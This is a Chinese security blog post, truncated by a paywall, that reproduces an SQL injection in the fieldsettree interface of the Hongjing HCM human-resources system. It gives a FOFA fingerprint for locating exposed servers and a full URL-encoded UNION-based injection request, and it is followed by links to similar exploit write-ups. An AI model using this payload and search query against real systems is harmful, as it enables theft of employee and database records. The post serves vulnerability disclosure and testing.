宏景HCM人力资源信息管理系统fieldsettree接口SQL注入

最新推荐文章于 2024-09-03 10:53:21 发布
最新推荐文章于 2024-09-03 10:53:21 发布
阅读量127 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136469016
版权
宏景HCM是一款涵盖人事管理多方面功能的系统,但其fieldsettree接口存在SQL注入漏洞,可能导致数据库敏感信息泄露。攻击者可利用此漏洞进行恶意活动。建议用户及时更新官方补丁以提升系统安全性。
摘要由CSDN通过智能技术生成

产品简介
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考核、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
漏洞描述
宏景HCM人力资源信息管理系统fieldsettree接口存在SQL注入漏洞,通过该漏洞可获取数据库敏感信息。
fofa
app=”HJSOFT-HCM”
漏洞复现

GET /templates/attestation/../../servlet/fieldsettree?flag=2&infor=1%27%20UNION%20ALL%20SELECT%2018%2CCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28SYSDATETIME%28%29%3DSYSDATETIME%28%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2C18--%20ltAi HTTP/1.1
Acc
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】宏景HCM downlawbase SQL注入漏洞
qq_67810151的博客
03-12 385
宏景HCM downlawbase 接口存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
【1day】复现宏景HCM codesettree SQL注入漏洞(CNVD-2023-08743)
记录并分享学习安全的知识点..
07-26 1295
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
记某景的一次代码审计
小司机的奥拓
07-17 636
我只能说,某景漏洞多的一。。。。。。今天,就捡两个公开过的漏洞进行下审计吧。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java -jar HrmsTool.jar -d xxx
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0xSec
05-30 4988
宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
SQL注入(基于 tryhackme 的讲解)
m0_61948493的博客
01-03 2887
sql注入的简单且详细的讲解
某购物商城系统commodtiy接口存在任意文件上传漏洞
weixin_43167326的博客
05-10 855
某购物商城系统commodtiy接口存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现】宏景ehr-hcm-khfieldtree-sql注入
知黑而守白
01-09 487
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在宏景EHR人力资源管理系统的 khfieldtree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现】宏景ehr-hcm-loadhistroyorgtree-sql注入
知黑而守白
01-09 427
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在宏景EHR人力资源管理系统的 loadhistroyorgtree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
基于SQL注入漏洞读写文件Getshell技巧
道阻且长,行则将至。
06-28 2120
文章目录前言手工注入靶场环境into outfileSQLMap靶场环境--os-shell读写文件总结 前言 在 HW 行动和攻防演练过程中,获得 Shell 的方式总结起来大概是以下几种(当然了如果能够通过源码泄露审计出 0day 的大佬的姿势另说……): 暴力破解+弱口令/未授权访问漏洞登录后台,任意文件上传漏洞 Getshell; Shiro、Struts2、Fastjson 等反序列化漏洞导致 RCE; 通过 SQL 注入漏洞写入木马文件并 Getshell…… 在前面一篇文章:渗透测试-Ph
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 1700
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。
宏景eHR downlawbase SQL注入漏洞复现
qq_36334672的博客
03-30 296
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户,支持流程,B/S架构。特别适合集团化管理和跨地域使用的产品,融合了最新的互联网技术和先进的人力资源管理理念和实践,更好地支持异地办公和网上流程,加强了人力资源业务的集中管理和协同,支持集团管控、目标管理、领导决策等应用。
某人力系统的代码审计
jennycisp的博客
07-17 825
最近看该系统漏洞公开较多,想审计练练手。
mysql注入攻击getshell_[漏洞案例]thinkcmf 2.x从sql注入到getshell实战
weixin_30856775的博客
02-02 382
文章中提到了三个漏洞,一个注入,两个模板注入写shell。但是系统是部署在linux下面的,模板注入是不行的。所以文章编辑处的sql注入漏洞是比较好的方法了。但是这里的注入需要登陆。虽然网站默认关闭了注册,登陆等前端页面展示。但其实后端的逻辑是没有关闭的。所以我们只要抓到注册,登陆的URL就可以注册一个用户,从而利用SQL注入漏洞了。第一步:注册用户因为注册用户需要用到验证码,请求验证码的URL为...
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2721
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
【网络安全】服务基础第一阶段——第九节:Windows系统管理基础---- Windows_AD域
最新发布
goldfish8848的博客
09-03 996
活动目录(Active Directory,AD)是微软Windows Server操作系统中的一个关键服务,它提供了一个集中的目录服务,用于管理网络环境中的用户、计算机、设备、应用程序和服务。,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、联系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
【网络安全漏洞挖掘
anquan2233的博客
08-29 1467
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
宏景eHR人力资源数据库设计与人员信息管理
"宏景eHR数据字典是关于人力资源管理(HRP)系统的一个数据库设计方案,主要用于存储和管理企业内部的机构、职位和人员信息。它支持多种数据库平台,包括Access、SQL Server和Oracle。数据结构包括主集和子集,以适应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值